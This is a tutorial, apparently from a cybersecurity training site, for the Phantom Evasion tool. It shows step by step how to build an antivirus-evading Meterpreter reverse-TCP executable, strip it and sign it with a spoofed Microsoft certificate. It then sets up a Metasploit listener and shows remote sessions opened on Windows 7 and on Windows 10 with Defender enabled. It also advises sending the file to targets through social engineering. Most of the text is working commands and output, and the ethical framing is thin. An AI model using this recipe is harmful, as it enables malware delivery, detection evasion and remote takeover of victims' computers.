Bypass antivirus detection With Phantom Payloads

According to ethical hacking courses, metasploit is the most popular tool used in pentesting. Metasploit tries to find weakness across your local network before an attacker does. This is the most common tool used by attacker’s to test security of operating system. In Kali Linux metasploit comes pre-installed with lots of payloads which are used to generate malicious executable’s to hack different platforms. But today we will show you a tool called Phantom Evasion which is used to generate FUD (Fully Undetectable) executable’s with msfvenom payload, demonstrated in the ethical hacking courses offered by International Institute of Cyber Security. According to developer Phantom Evasion main aim is to bypass antivirus detection or we can say Antivirus Evasion.

  • Phantom Evasion has been tested on Kali Linux 2018.4 amd64).
  • For cloning type git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Type cd Phantom-Evasion
  • Type chmod u+x phantom-evasion.py
  • Type python3 phantom-evasion.py
  • When running first time it may encounter some error but the tool will work perfectly.
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1
    =====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Type 1
 
[>] Please insert option: 1
  • Type 2

[+] WINDOWS MODULES INDEX:
[1] Shellcode Injection
[2] Stager
[3] Powershell / Wine-pyinstaller
[0] Back
[>] Please insert option: 2
  • Type 1

[+] WINDOWS STAGER MODULES:
[1] X86 stagers
[2] X64 stagers
[0] Back
[>] Please insert option: 1
  • Type 3

[+] WINDOWS x86 STAGER MODULES:
[1] C meterpreter/reverse_TCP VirtualAlloc (C)
[2] C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (C)
[3] C meterpreter/reverse_TCP HeapAlloc (C)
[4] C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (C)
[5] C meterpreter/reverse_HTTP VirtualAlloc (C)
[6] C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (C)
[7] C meterpreter/reverse_HTTP HeapAlloc (C)
[8] C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (C)
[9] C meterpreter/reverse_HTTPS VirtualAlloc (C)
[10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (C)
[11] C meterpreter/reverse_HTTPS HeapAlloc (C)
[12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (C)
[0] Back
  • After selecting any payload it will display description of the payload & on what extension the payload will build.
[+] MODULE DESCRIPTION:
This Module generate and compile
32bit pure c meterpreter reverse tcp stagers.
Require msfconsole multi/handler listener
with payload set to windows/meterpreter/reverse_tcp
[>] Memory allocation type: HEAP
[>] TYPE: TCP
[>] STATIC EVASION:
Polymorphic source code
[>] DYNAMIC EVASION:
Resource consumption technique
Sandbox-aware code
[>] AUTOCOMPILE(cross platform): to EXE file
Press Enter to continue:
  • Type 192.168.1.6 (Listen/ Attacker’s IP address)
[>] Please insert LHOST: 192.168.1.6
  • Type 443 (Listen/ Attacker’s Port)
[>] Please insert LPORT: 443
  • Then enter filename : file
[>] Please insert output filename: file
  • Type n to create only single process in target computer. So it become less chance to get caught by the antivirus.
[>] Spawn Multiple Processes:
During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.
Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code
[>] Add multiple processes behaviour?(y/n): n
  • Type y
[>] Generating C meterpreter stager
[>] Compiling…
[>] Strip
strip is a GNU utility to "strip" symbols from object files.
This is useful for minimizing their file size, streamlining them for distribution.
It can also be useful for making it more difficult to reverse-engineer the compiled code.
(Lower rate of detection)
[>] Strip executable? (y/n): y
  • The above query will minimize the malicious file size.
  • Type y
[>] Sign Executable
Online Certificate spoofer & Executabe signer (Lower rate of detection)
[>] Sign executable? (y/n): y
  • Above query will sign the malicious file with default certificate comes with phantom evasion.
  • You can use your own certificate or use it with Microsoft certificate which comes with phantom evasion.
  • Type y
  • Type 1
Certificates directory is not empty , use already existing certificate? (y/n): y
[1] www.microsoft.com
[2] Create new certificate
[>] Select a Certificate or create a new one: 1
  • Type 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
[>] Signing file1.exe with osslsigncode…
[>] Succeeded
[<>] File saved in Phantom-Evasion folder
  • After creating malicious code send the file to target. You can use any social engineering to trick your target.

Testing Windows Platform :-

  • For testing we are using Windows 7 (32 Bit) with Windows Defender Disabled.
  • Open the executable file using by pressing enter.
  • For checking the payload. You can use metasploit multi handler which comes pre-installed in Kali Linux. Open another terminal & type msfconsole.
  • Type use multi/handler
msf > use multi/handler
  • Type LHOST 192.168.1.6 (same as you entered in phantom evasion).
  • Type LPORT 443 (same as you entered in phantom evasion).
  • Type show options
msf exploit(multi/handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.6 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
  • Type run
msf exploit(multi/handler) > run
  • As malicious is already started in Windows 7 Professional 32 Bit. After typing run a new session will be created between attacker & target machines.
  • Typesysinfo to check the target computer details.
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.9
[*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
meterpreter > sysinfo
Computer : WIN-31VSBP3FUQT
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
  • Now you can manipulate the target using meterpreter command shell.
  • Now for further testing we have used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled.
  • Open the malicious exe in Windows 10 machine. As you open the exe a new session will be created in multi/ handler.
  • Type sysinfo to check the target computer details.
[] Started reverse TCP handler on 192.168.1.6:443 [] Sending stage (179779 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
meterpreter > sysinfo
Computer : DESKTOP-I9LEAU8
OS : Windows 10 (Build 17758).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
  • Now you can manipulate the target using meterpreter command shell.

According to ethical hacking researcher of International Institute of Cyber Security can be used to generate initial level payload which can be customize further to bypass other Antivirus.